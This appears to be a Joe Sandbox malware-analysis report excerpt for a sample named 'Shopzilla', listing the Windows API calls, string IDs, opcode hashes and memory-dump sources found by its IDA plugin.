                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 58aad49060df19cf562414eba955f3f8690c55ff2822db918e9d19143480057e
                                              • Instruction ID: c95bf8817c1337b01052c20fb383189a510a9fbd6eff7ff057b9b7ebeac788ab
                                              • Opcode Fuzzy Hash: 58aad49060df19cf562414eba955f3f8690c55ff2822db918e9d19143480057e
                                              • Instruction Fuzzy Hash: 2D51AF701183019FC714EF14C892AAFB7E9EF85700F50486DF9A6572E2DBB1DE19CA52
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: 5f886cc56833e5cba4922984d9964307b43b6d0e8f8aa96c01c829de4f0b19df
                                              • Instruction ID: a58f58ff37d04d0612ef275dcaae2e57c598be503e9ccc9e1af2451777571c66
                                              • Opcode Fuzzy Hash: 5f886cc56833e5cba4922984d9964307b43b6d0e8f8aa96c01c829de4f0b19df
                                              • Instruction Fuzzy Hash: 9A41D671518209AFDB24DF78D882E7AB7E8EB45300F2044EFE589D7291EAB29D41DB10
                                              APIs
                                              • _memset.LIBCMT ref: 00C27557
                                              • CreateMenu.USER32 ref: 00C27572
                                              • SetMenu.USER32(?,00000000), ref: 00C27581
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C2760E
                                              • IsMenu.USER32(?), ref: 00C27624
                                              • CreatePopupMenu.USER32 ref: 00C2762E
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C2765B
                                              • DrawMenuBar.USER32 ref: 00C27663
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: 620449ca733e830517b76f298f9b511ca49336500d0b602eedecb5ff425ab0c6
                                              • Instruction ID: 829bbd36ca69074a76c6dc53d10794fd5bb494a98a1d7ec0033258da610671ac
                                              • Opcode Fuzzy Hash: 620449ca733e830517b76f298f9b511ca49336500d0b602eedecb5ff425ab0c6
                                              • Instruction Fuzzy Hash: 2F415779A04219EFDB20DF69E884B9ABBF5FF49340F140129F955A7360D770AA10CF94
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C2794B
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00C27952
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C27965
                                              • SelectObject.GDI32(00000000,00000000), ref: 00C2796D
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C27978
                                              • DeleteDC.GDI32(00000000), ref: 00C27981
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00C2798B
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C2799F
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C279AB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: eb4a82d0564d90fff4c1d205a475c3f801069434be22cdd101c4fcd345e1e733
                                              • Instruction ID: c2d9c99223fae1df77811eca3dda2078b07350d19f112ad8ba0ee8cde541d8d2
                                              • Opcode Fuzzy Hash: eb4a82d0564d90fff4c1d205a475c3f801069434be22cdd101c4fcd345e1e733
                                              • Instruction Fuzzy Hash: A5316B32114229AFDF11AF64EC49FDE3B69FF09320F210315FA65A61A0C731D961DBA4
                                              APIs
                                              • _memset.LIBCMT ref: 00BC6F9B
                                                • Part of subcall function 00BC8C88: __getptd_noexit.LIBCMT ref: 00BC8C88
                                              • __gmtime64_s.LIBCMT ref: 00BC7034
                                              • __gmtime64_s.LIBCMT ref: 00BC706A
                                              • __gmtime64_s.LIBCMT ref: 00BC7087
                                              • __allrem.LIBCMT ref: 00BC70DD
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC70F9
                                              • __allrem.LIBCMT ref: 00BC7110
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC712E
                                              • __allrem.LIBCMT ref: 00BC7145
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC7163
                                              • __invoke_watson.LIBCMT ref: 00BC71D4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                              • Instruction ID: 909483b723dca8eb68e3c405b5decec382066e908f450d5985e6ac74a1fb7f45
                                              • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                              • Instruction Fuzzy Hash: 2871D472A40716ABD7149F79DC82F6AB3E8EF15724F1442BEF514E7281EB70D9408BA0
                                              APIs
                                              • _memset.LIBCMT ref: 00C02B55
                                              • GetMenuItemInfoW.USER32(00C66890,000000FF,00000000,00000030), ref: 00C02BB6
                                              • SetMenuItemInfoW.USER32(00C66890,00000004,00000000,00000030), ref: 00C02BEC
                                              • Sleep.KERNEL32(000001F4), ref: 00C02BFE
                                              • GetMenuItemCount.USER32(?), ref: 00C02C42
                                              • GetMenuItemID.USER32(?,00000000), ref: 00C02C5E
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00C02C88
                                              • GetMenuItemID.USER32(?,?), ref: 00C02CCD
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C02D13
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C02D27
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C02D48
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: f1abf64b13157616b1522146c70a9e44f14724f59ca8f97932ccbe92e4f641c0
                                              • Instruction ID: 5406c672725c91833924bce708c7e4b277fe2d47ca2a083a3c894ae4d1183c62
                                              • Opcode Fuzzy Hash: f1abf64b13157616b1522146c70a9e44f14724f59ca8f97932ccbe92e4f641c0
                                              • Instruction Fuzzy Hash: 526181B1900249AFEF21CF64DC9CEBEBBB8FB40308F240559E851A7291D771AE45DB61
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C27392
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C27395
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C273B9
                                              • _memset.LIBCMT ref: 00C273CA
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C273DC
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C27454
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 0b035e580c1e25314b3d1e8db3a3d38c74d35db18afc49d27f7e0705b9af745e
                                              • Instruction ID: b7957c9ce301b10f56e0585af58802765ec75aff49b37fac81f128ee99e069a2
                                              • Opcode Fuzzy Hash: 0b035e580c1e25314b3d1e8db3a3d38c74d35db18afc49d27f7e0705b9af745e
                                              • Instruction Fuzzy Hash: 6B615975900218AFDB21DFA8DC81EEE77F8EB49714F1001A9FA14A72A1C770AE45DF90
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BF75C0
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00BF7619
                                              • VariantInit.OLEAUT32(?), ref: 00BF762B
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BF764B
                                              • VariantCopy.OLEAUT32(?,?), ref: 00BF769E
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BF76B2
                                              • VariantClear.OLEAUT32(?), ref: 00BF76C7
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00BF76D4
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BF76DD
                                              • VariantClear.OLEAUT32(?), ref: 00BF76EF
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BF76FA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 633af799a7aa9589b8d0c52cc0f81861d518ea074a45a4dea29bd0a3af317963
                                              • Instruction ID: 577dbbf7e662bdb199572a41580d0c33f9b63bc9aa3796e104b798f0cbc307a0
                                              • Opcode Fuzzy Hash: 633af799a7aa9589b8d0c52cc0f81861d518ea074a45a4dea29bd0a3af317963
                                              • Instruction Fuzzy Hash: FA415135A1421DAFCB04DF68D854AADBBF9FF48350F1080A9EA55A7251CB70EE49CB90
                                              APIs
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • CoInitialize.OLE32 ref: 00C188B5
                                              • CoUninitialize.OLE32 ref: 00C188C0
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00C33BBC,?), ref: 00C18920
                                              • IIDFromString.OLE32(?,?), ref: 00C18993
                                              • VariantInit.OLEAUT32(?), ref: 00C18A2D
                                              • VariantClear.OLEAUT32(?), ref: 00C18A8E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: b3c2c12fc7983e9683fce012c866db21596d16b98d654895ab2147388495aea5
                                              • Instruction ID: dbf4bda48e90ea97316a0d59dc49c2743aad33f71b461b9d1655290ed0b848b7
                                              • Opcode Fuzzy Hash: b3c2c12fc7983e9683fce012c866db21596d16b98d654895ab2147388495aea5
                                              • Instruction Fuzzy Hash: 81619F716087019FD710DF24C849BAEB7E4AF46714F104959F9859B291CB70EE8CEB92
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00C0B980
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C0B9F6
                                              • GetLastError.KERNEL32 ref: 00C0BA00
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00C0BA6D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 102e577a59478fda564e94f6096015c428b8836b11eb99dc9bc91d829df83902
                                              • Instruction ID: b45becd66ab7e99e2e0086079671acdca606f3295bb2b9f9c784d3b0ec866a71
                                              • Opcode Fuzzy Hash: 102e577a59478fda564e94f6096015c428b8836b11eb99dc9bc91d829df83902
                                              • Instruction Fuzzy Hash: 6331B035B00209AFCB10EF68D895ABEBBB8EF44300F1080A9F916D72D1DB719E45DB90
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00BFB57D: GetClassNameW.USER32(?,?,000000FF), ref: 00BFB5A0
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00BF99AF
                                              • GetDlgCtrlID.USER32 ref: 00BF99BA
                                              • GetParent.USER32 ref: 00BF99D6
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BF99D9
                                              • GetDlgCtrlID.USER32(?), ref: 00BF99E2
                                              • GetParent.USER32(?), ref: 00BF99FE
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BF9A01
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: faec08a86c7323023dadaad09426f25fa07b5beb32a372d3fc618a5d74344931
                                              • Instruction ID: fb48338c8937514b2cc4db3796181d26d5d5e90f44aed14e96dd51264e3da875
                                              • Opcode Fuzzy Hash: faec08a86c7323023dadaad09426f25fa07b5beb32a372d3fc618a5d74344931
                                              • Instruction Fuzzy Hash: 03212171A00208BFDF00AB64CCA5FFEBBB8EF94300F104195FA61932E5DB744828CA20
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00BFB57D: GetClassNameW.USER32(?,?,000000FF), ref: 00BFB5A0
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00BF9A98
                                              • GetDlgCtrlID.USER32 ref: 00BF9AA3
                                              • GetParent.USER32 ref: 00BF9ABF
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BF9AC2
                                              • GetDlgCtrlID.USER32(?), ref: 00BF9ACB
                                              • GetParent.USER32(?), ref: 00BF9AE7
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BF9AEA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 96b1ef1f66a531918510b4951a105e26a5f8fdc1f1bed66ed807e88c96c1b537
                                              • Instruction ID: efb741be8b60a478d37a8c7d8ee7480766324b94f95690e2faed3925752a254b
                                              • Opcode Fuzzy Hash: 96b1ef1f66a531918510b4951a105e26a5f8fdc1f1bed66ed807e88c96c1b537
                                              • Instruction Fuzzy Hash: 7221C175A00108BFDB00AB64CCA5FFEBBB9EF94300F500151F96197295DB755859DA20
                                              APIs
                                              • GetParent.USER32 ref: 00BF9B0A
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00BF9B1F
                                              • _wcscmp.LIBCMT ref: 00BF9B31
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BF9BAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-3381328864
                                              • Opcode ID: 4bcbb822a573a05749a0eabc82d9dfa3cf5b02979d6c58544574a8300abacf14
                                              • Instruction ID: 83f8d8bed03b79c01af094986255fd18e01d15acfa332877e2fff2f2e8d75652
                                              • Opcode Fuzzy Hash: 4bcbb822a573a05749a0eabc82d9dfa3cf5b02979d6c58544574a8300abacf14
                                              • Instruction Fuzzy Hash: 27110D7764830AFAF6142A11FC07FB673DCDB15721B2040A6FF04B60E3FEA258594519
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00C18D89
                                              • CoInitialize.OLE32(00000000), ref: 00C18DB6
                                              • CoUninitialize.OLE32 ref: 00C18DC0
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00C18EC0
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C18FED
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C33BDC), ref: 00C19021
                                              • CoGetObject.OLE32(?,00000000,00C33BDC,?), ref: 00C19044
                                              • SetErrorMode.KERNEL32(00000000), ref: 00C19057
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C190D7
                                              • VariantClear.OLEAUT32(?), ref: 00C190E7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: f8e5c60c599924da93bdb1d7a998020c6c719881aa367110d8f7de139183d5d5
                                              • Instruction ID: 69e86bbe1e4369cdeb18de66bf28ff7358934adaa1b3c26070bc0620b55a7147
                                              • Opcode Fuzzy Hash: f8e5c60c599924da93bdb1d7a998020c6c719881aa367110d8f7de139183d5d5
                                              • Instruction Fuzzy Hash: 9FC177712083059FC700EF64C894A6BB7E9FF8A308F00495DF58A9B251DB71ED89CB92
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C07E94
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ArraySafeVartype
                                              • String ID:
                                              • API String ID: 1725837607-0
                                              • Opcode ID: cb514c9af558f6b34c8f90ce721bb983e4fb1de74ddf908eaa0b8e9fdfca105c
                                              • Instruction ID: 52aef0094e2073da0cedfdd3925638c6fde2d8e9ccff8cdd3a502ad4b5b586c6
                                              • Opcode Fuzzy Hash: cb514c9af558f6b34c8f90ce721bb983e4fb1de74ddf908eaa0b8e9fdfca105c
                                              • Instruction Fuzzy Hash: 49B1AE71D0421A9FDB00DFA4C884BBEB7F4EF48324F208169E650E7281DB74E945DBA0
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00C0185B
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C008D3,?,00000001), ref: 00C0186F
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00C01876
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C008D3,?,00000001), ref: 00C01885
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C01897
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C008D3,?,00000001), ref: 00C018B0
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C008D3,?,00000001), ref: 00C018C2
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C008D3,?,00000001), ref: 00C01907
                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C008D3,?,00000001), ref: 00C0191C
